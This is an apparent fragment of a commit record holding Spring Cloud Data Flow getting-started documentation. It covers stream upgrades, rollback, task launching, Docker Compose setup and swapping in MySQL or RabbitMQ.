httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502 Last updated 
\u2502 Status \u2502Package Name\u2502Package Version\u2502 Description \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25512 \u2502Mon Nov 27 22:41:16 EST 2017\u2502DEPLOYED\u2502httptest \u25021.0.0 \u2502Upgrade complete\u2551\n\u25511 \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\n===== Stream Manifest\n\nThe manifest is a YAML document that represents the final state of what was deployed to the platform.\nYou can view the manifest for any stream version by using the `stream manifest --name <name-of-stream> --releaseVersion <optional-version>` command.\nIf the `--releaseVersion` is not specified, the manifest for the last version is returned.\nThe following listing shows a typical `stream manifest` command and its output:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name httptest\n\n---\n# Source: log.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: log\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: log\n spring.cloud.stream.metrics.key: httptest.log.${spring.cloud.application.guid}\n spring.cloud.stream.bindings.input.group: httptest\n spring.cloud.stream.metrics.properties: spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: sink\n spring.cloud.stream.bindings.input.destination: httptest.http\n deploymentProperties:\n spring.cloud.deployer.indexed: true\n spring.cloud.deployer.group: httptest\n spring.cloud.deployer.count: 1\n\n---\n# Source: http.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: http\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: http\n spring.cloud.stream.metrics.key: httptest.http.${spring.cloud.application.guid}\n spring.cloud.stream.bindings.output.producer.requiredGroups: httptest\n spring.cloud.stream.metrics.properties: 
spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n server.port: 9000\n spring.cloud.stream.bindings.output.destination: httptest.http\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: source\n deploymentProperties:\n spring.cloud.deployer.group: httptest\n----\n====\n\nThe majority of the deployment and application properties were set by Data Flow to enable the applications to talk to each other and to send application metrics with identifying labels.\n\nIf you compare this YAML document to the one for `--releaseVersion=1`, you can see the difference in the log application version.\n
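\nFor example, you can retrieve the manifest for the first version of the `httptest` stream by running the following command (a sketch that uses the `--releaseVersion` option described above; the version numbers come from the `stream history` output):\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name httptest --releaseVersion 1\n----\n====\n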
\n[[getting-started-local-streams-rollback]]\n==== Rolling Back\n\nTo go back to the previous version of the stream, you can use the `stream rollback` command, as shown (with its output) in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream rollback --name httptest\nRollback request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is back to 1.1.0.RELEASE.\nThe `http` source process remains unchanged.\nThe following listing shows the `jps` command and typical output:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n23939 log-sink-rabbit-1.1.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file for the Skipper server by using the following commands:\n\n====\n[source,bash]\n----\ncd \/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 21487 --- [ StateUpdate-2] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v3 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v3 to be healthy.\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v3 has been DEPLOYED\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v3 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world rollback\"\n----\n====\n\nThe log message in the log sink is now back at the info level, as shown in the following example:\n\n====\n[source,bash]\n----\nINFO 23939 --- [http.httptest-1] log-sink : hello world rollback\n----\n====\n\nThe `history` command now shows that the third version of the stream has been deployed, as shown (with its output) in the following listing:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502 Last updated \u2502 Status \u2502Package Name\u2502Package Version\u2502 Description \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25513 \u2502Mon Nov 27 23:01:13 EST 2017\u2502DEPLOYED\u2502httptest \u25021.0.0 \u2502Upgrade complete\u2551\n\u25512 \u2502Mon Nov 27 22:41:16 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u25511 \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nIf you look at the manifest for version 3, you can see that it shows version 1.1.0.RELEASE for the log sink.\n\n\n\n=== Deploying Tasks\n\nThis section shows how to register a task, create a task definition, and then launch the task.\nWe also review information about the task executions.\n\nNOTE: Launching Spring Cloud Task applications is not delegated to Skipper, since they are short-lived applications. Tasks are always deployed directly through the Data Flow Server.\n\n. Register a Task App\n+\nBy default, the application registry is empty.\nAs an example, we register one task application, `timestamp`, which simply prints the current time to the log.\nThe following command registers the timestamp application:\n+\n====\n[source,bash]\n----\ndataflow:>app register --name timestamp --type task --uri maven:\/\/org.springframework.cloud.task.app:timestamp-task:1.3.0.RELEASE\nSuccessfully registered application 'task:timestamp'\n----\n====\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n\n. 
Create a Task Definition\n+\nYou can use the `task create` command to create a task definition that uses the previously registered `timestamp` application.\nIn the following example, no additional properties are used to configure the `timestamp` application:\n+\n====\n[source,bash]\n----\ndataflow:> task create --name printTimeStamp --definition \"timestamp\"\n----\n====\n\n. Launch a Task\n+\nTask definitions are launched through the shell's `task launch` command, as the following example shows:\n+\n====\n[source,bash]\n----\ndataflow:> task launch printTimeStamp\n----\n====\n+\nYou should check to see if a timestamp ended up in the log file for the timestamp task.\nThe location of the log file for the task application appears in the Data Flow server\u2019s log.\nYou should see a log entry similar to the following:\n+\n====\n[source,bash]\n----\nTimestampTaskConfiguration$TimestampTask : 2018-02-28 16:42:21.051\n----\n====\n\n. Review the Task Execution\n+\nYou can obtain information about the task execution by running the `task execution list` command, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 Task Name \u2502ID\u2502 Start Time \u2502 End Time \u2502Exit Code\u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551printTimeStamp\u25021 \u2502Wed Feb 28 16:42:21 EST 2018\u2502Wed Feb 28 16:42:21 EST 2018\u25020 \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n+\nYou can obtain additional information by running the command `task execution status`, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution status --id 
1\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 Key \u2502 Value \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551Id \u25021 \u2551\n\u2551Name \u2502printTimeStamp \u2551\n\u2551Arguments \u2502[--spring.cloud.task.executionid=1] \u2551\n\u2551Job Execution Ids \u2502[] \u2551\n\u2551Start Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551End Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551Exit Code \u25020 \u2551\n\u2551Exit Message \u2502 \u2551\n\u2551Error Message \u2502 \u2551\n\u2551External Execution Id \u2502printTimeStamp-ab86b2cc-0508-4c1e-b33d-b3896d17fed7\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nThe <<spring-cloud-dataflow-task>> section has more information on the lifecycle of Tasks and how to use\n<<spring-cloud-dataflow-composed-tasks>>, which let you create a directed graph where each node of the graph is a task application.\n","old_contents":"[[getting-started-local]]\n== Getting Started - Local\n\n[partintro]\n--\nIf you are getting started with Spring Cloud Data Flow, this section is for you.\nIn this section, we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions.\nYou can find a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe then build an introductory Spring Cloud Data Flow application, discussing some core principles as we go.\n--\n\n\n[[getting-started-local-system-requirements]]\n=== System Requirements\n\nYou need Java 8 to run Spring Cloud Data Flow. To build it, you also need Maven.\n\nBoth the Data Flow Server and Skipper Server need to have an RDBMS installed. The Data Flow Server stores stream and task definitions. It also stores the execution state of deployed tasks. 
The Skipper server stores the execution state of deployed streams.\n\nBy default, the Data Flow server uses an embedded H2 database for this purpose, but you can configure the server to use an external database.\n\nFor the deployed stream applications to communicate, a messaging middleware product needs to be installed.\nWe provide prebuilt stream applications that use link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka]; however, other https:\/\/cloud.spring.io\/spring-cloud-stream\/#binder-implementations[messaging middleware products] are supported.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker]]\n=== Getting Started with Docker Compose\n\nSpring Cloud Data Flow provides a Docker Compose file to let you quickly bring up Spring Cloud Data Flow, Skipper, and the Apache Kafka broker, instead of having to install them manually.\n\nNOTE: We recommend that you upgrade to the link:https:\/\/docs.docker.com\/compose\/install\/[latest version] of Docker before running the `docker-compose` command. We have tested it against Docker Engine version `18.09.2`.\n\nThe following sections describe how to get started with Docker Compose:\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-download]]\n=== Downloading the Docker Compose File\n\nBefore you do anything else, you need to download the Docker Compose file. To do so:\n\n. Download the Spring Cloud Data Flow Server Docker Compose file:\n+\n====\n[source,bash,subs=attributes]\n----\n$ wget https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml\n----\n====\n\nNOTE: If the `wget` command is unavailable, you can use `curl` or another platform-specific utility. Alternatively, you can navigate to https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml[https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml] in a web browser and save the contents. Ensure the downloaded filename is `docker-compose.yml`.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-starting]]\n=== Starting Docker Compose\n\nTo get started, you need to start Docker Compose. To do so:\n\n. In the directory where you downloaded `docker-compose.yml`, start the system, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ export DATAFLOW_VERSION={local-server-image-tag}\n$ export SKIPPER_VERSION={skipper-version}\n$ docker-compose up\n----\n====\n\nThe `docker-compose.yml` file defines `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables, so that those values can be easily changed. The preceding commands first set the `DATAFLOW_VERSION` and `SKIPPER_VERSION` to use in the environment. Then `docker-compose` is started.\n\nYou can also use a shorthand version that exposes only the `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables to the `docker-compose` process (rather than setting them in the environment), as follows:\n\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose up\n----\n====\n\nIf you use Windows, environment variables are defined by using the `set` command. To start the system on Windows, enter the following commands:\n\n====\n[source,bash,subs=attributes]\n----\nC:\\ set DATAFLOW_VERSION={local-server-image-tag}\nC:\\ set SKIPPER_VERSION={skipper-version}\nC:\\ docker-compose up\n----\n====\n\nNOTE: By default, Docker Compose uses locally available images.\nFor example, when using the `latest` tag, run `docker-compose pull` prior to `docker-compose up` to ensure the latest image is downloaded.\n
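\nFor example, assuming you track the `latest` image tags, a refresh could look like the following sketch (both commands are run from the directory that contains `docker-compose.yml`):\n\n====\n[source,bash,subs=attributes]\n----\n$ docker-compose pull\n$ docker-compose up\n----\n====\n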
\nSpring Cloud Data Flow is ready for use once the `docker-compose` command stops emitting log messages.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-launch]]\n=== Launching Spring Cloud Data Flow\n\nNow that Docker Compose is up, you can launch the Spring Cloud Data Flow Dashboard. To do so, in your browser, navigate to the link:http:\/\/localhost:9393\/dashboard[Spring Cloud Data Flow Dashboard].\nBy default, the latest GA releases of Stream and Task applications are imported automatically.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-create-stream]]\n=== Creating a Stream\n\nTo create a stream:\n\n. In the menu, click *Streams*.\n. Click the *Create Stream(s)* button.\n+\nThe screen changes to the following image:\n+\n.Create Stream Page\nimage::images\/dataflow-create-stream-start.png[Create Stream Page, scaledwidth=\"60%\"]\n. In the text area, type `time | log`.\n. Click *Create Stream*.\n. Enter `ticktock` for the stream name, as shown in the following image:\n+\n.Creating a Stream\nimage::images\/dataflow-stream-create.png[Creating a Stream, scaledwidth=\"60%\"]\n. Click the *Create the stream* button.\n+\nThe Definitions page appears.\n+\n.Definitions Page\nimage::images\/dataflow-definitions-page.png[Definitions Page, scaledwidth=\"60%\"]\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-deploy-stream]]\n=== Deploying a Stream\n\nNow that you have defined a stream, you can deploy it. To do so:\n\n. Click the play (deploy) button next to the \"`ticktock`\" definition that you created in the previous section.\n+\n.Initiate Deployment of a Stream\nimage::images\/dataflow-stream-definition-deploy.png[Initiate Deployment of a Stream, scaledwidth=\"60%\"]\n+\nThe UI shows the available properties that can be applied to the apps in the \"`ticktock`\" stream.\nThe example shown in the following image uses the defaults:\n+\n.Deployment Page\nimage::images\/dataflow-deploy-ticktock.png[Deployment Page, scaledwidth=\"60%\"]\n. Click the *Deploy Stream* button.\n+\nThe UI returns to the Definitions page.\n+\nThe stream is now in \"`deploying`\" status, and its status becomes \"`deployed`\" when it is finished deploying.\nYou may need to refresh your browser to see the updated status.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-viewing-stream-logs]]\n=== Viewing Stream Logs\n\nOnce a stream is deployed, you can view its logs. To do so:\n\n. Click *Runtime* in the menu.\n. Click \"`ticktock.log`\".\n. Copy the path in the \"`stdout`\" text box on the dashboard.\n. In another console window, type the following, replacing `\/path\/from\/stdout\/textbox\/in\/dashboard` with the value you copied in the previous step:\n+\n====\n[source,bash,subs=attributes]\n----\n$ docker exec -it skipper tail -f \/path\/from\/stdout\/textbox\/in\/dashboard\n----\n====\n+\nThe output of the log sink appears in the new window, printing a timestamp once per second.\n. 
When you have seen enough of that output, press Ctrl+C to end the `tail` command.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-deleting-stream]]\n=== Deleting a Stream\n\nNow you can delete the stream you created. To do so:\n\n. Click *Streams* in the menu.\n. Click the down chevron on the \"`ticktock`\" row.\n. Click *Destroy Stream*.\n. When prompted for confirmation, click *Destroy Stream Definition(s)*.\n\n=== Destroying the Quick Start Environment\n\nYou have finished the getting started guide for using Docker locally, so you can now shut down the environment that you brought up with `docker-compose up`. To do so:\n\n. Open a new terminal window.\n. Change directory to the directory in which you started (where the `docker-compose.yml` file is located).\n. Run the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose down\n----\n====\n+\n(You need to specify the `DATAFLOW_VERSION` and the `SKIPPER_VERSION` because you are running the command in a separate terminal window. The `export` commands you used earlier set the variables for only that terminal window, so those values are not found in the new terminal window. If all else fails, you can shut it down with Ctrl+C. Don't do that for non-demo instances, though.)\n\nNOTE: Some stream applications may open a port, for example `http --server.port=`. By default, a port range of `9000-9010` is exposed from the container to the host. If you need to change this range, you can modify the `ports` block of the `dataflow-server` service in the `docker-compose.yml` file.\n\n\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker]]\n==== Spring Cloud Data Flow Shell\n\nFor convenience and as an alternative to using the Spring Cloud Data Flow Dashboard, the Spring Cloud Data Flow Shell is also included in the `springcloud\/spring-cloud-dataflow-server` Docker image.\nTo use it, open another console window and type the following:\n\n====\n[source,bash]\n----\n$ docker exec -it dataflow-server java -jar shell.jar\n----\n====\n\nUsing the Spring Cloud Data Flow Shell is further described in <<shell,Shell>>.\n\n==== Spring Cloud Data Flow Monitoring\n\nBy default, the Data Flow `docker-compose` configures Stream monitoring with InfluxDB and pre-built dashboards for Grafana.\n\nFor further instructions about Data Flow monitoring, see <<streams-monitoring-local-influx,Streams Monitoring InfluxDB>>.\n\nimage::{dataflow-asciidoc}\/images\/grafana-influxdb-scdf-streams-dashboard.png[Grafana InfluxDB Dashboard, scaledwidth=\"50%\"]\n\n==== Docker Compose Customization\n\nOut of the box, Spring Cloud Data Flow uses the H2 embedded database for storing state and Kafka for communication.\nYou can customize these components by editing the `docker-compose.yml` file, as the following sections describe.\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-mysql]]\n===== Using MySQL Rather than the H2 Embedded Database\n\nYou can use MySQL rather than the H2 embedded database.\nTo do so:\n\n. Add the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n mysql:\n image: mysql:5.7.25\n environment:\n MYSQL_DATABASE: dataflow\n MYSQL_USER: root\n MYSQL_ROOT_PASSWORD: rootpw\n expose:\n - 3306\n----\n====\n\n. 
Add the following entries to the `environment` block of the `dataflow-server` service definition:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.datasource.url=jdbc:mysql:\/\/mysql:3306\/dataflow\n - spring.datasource.username=root\n - spring.datasource.password=rootpw\n - spring.datasource.driver-class-name=org.mariadb.jdbc.Driver\n----\n====\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-rabbitmq]]\n===== Using RabbitMQ Instead of Kafka for Communication\n\nYou can use RabbitMQ rather than Kafka for communication. To do so:\n\n. Replace the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n kafka:\n image: wurstmeister\/kafka:2.11-0.11.0.3\n expose:\n - \"9092\"\n environment:\n - KAFKA_ADVERTISED_PORT=9092\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\n - KAFKA_ADVERTISED_HOST_NAME=kafka\n zookeeper:\n image: wurstmeister\/zookeeper\n expose:\n - \"2181\"\n----\n====\n+\nWith the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n rabbitmq:\n image: rabbitmq:3.7\n expose:\n - \"5672\"\n----\n====\n\n. In the `dataflow-server` services configuration block, add the following `environment` entry:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.cloud.dataflow.applicationProperties.stream.spring.rabbitmq.host=rabbitmq\n----\n====\n\n. Replace the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n depends_on:\n - kafka\n----\n====\n+\nWith:\n+\n====\n[source,yaml,subs=attributes]\n----\n depends_on:\n - rabbitmq\n----\n====\n\n. Modify the `app-import` service definition `command` attribute to replace `http:\/\/bit.ly\/Einstein-SR2-stream-applications-kafka-maven` with `http:\/\/bit.ly\/Einstein-SR2-stream-applications-rabbit-maven`.\n\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-app-starters]]\n===== Enabling App Starters from the Host\n\nYou can enable registration of app starters directly from the host machine.\nTo do so:\n\n. Mount the source host folders to the `dataflow-server` container.\n+\nFor example, if the `my-app.jar` is in the `\/thing1\/thing2\/apps` folder on your host machine, add the following `volumes` block to the `dataflow-server` service definition:\n+\n====\n[source,yaml,subs=attributes]\n----\n dataflow-server:\n image: springcloud\/spring-cloud-dataflow-server:${DATAFLOW_VERSION}\n container_name: dataflow-server\n ports:\n - \"9393:9393\"\n environment:\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.brokers=kafka:9092\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.zkNodes=zookeeper:2181\n volumes:\n - \/thing1\/thing2\/apps:\/root\/apps\n----\n====\n\nThis configuration provides access to the `my-app.jar` (and the other files in the folder) from within the container's `\/root\/apps\/` folder. See the https:\/\/docs.docker.com\/compose\/compose-file\/compose-file-v2\/[compose-file reference] for further configuration details.\n\nNOTE: The explicit volume mounting couples docker-compose to your host's file system, limiting the portability to other machines and operating systems. Unlike `docker`, `docker-compose` does not allow volume mounting from the command line (for example, no `-v` parameter). Instead, you can define a placeholder environment variable (such as `HOST_APP_FOLDER`) in place of the hardcoded path by using `- ${HOST_APP_FOLDER}:\/root\/apps` and setting this variable before starting docker-compose.\n
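\nFor example, with the `volumes` entry rewritten as `- ${HOST_APP_FOLDER}:\/root\/apps`, you could start the environment as in the following sketch (the folder path reuses the hypothetical example above):\n\n====\n[source,bash,subs=attributes]\n----\n$ export HOST_APP_FOLDER=\/thing1\/thing2\/apps\n$ docker-compose up\n----\n====\n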
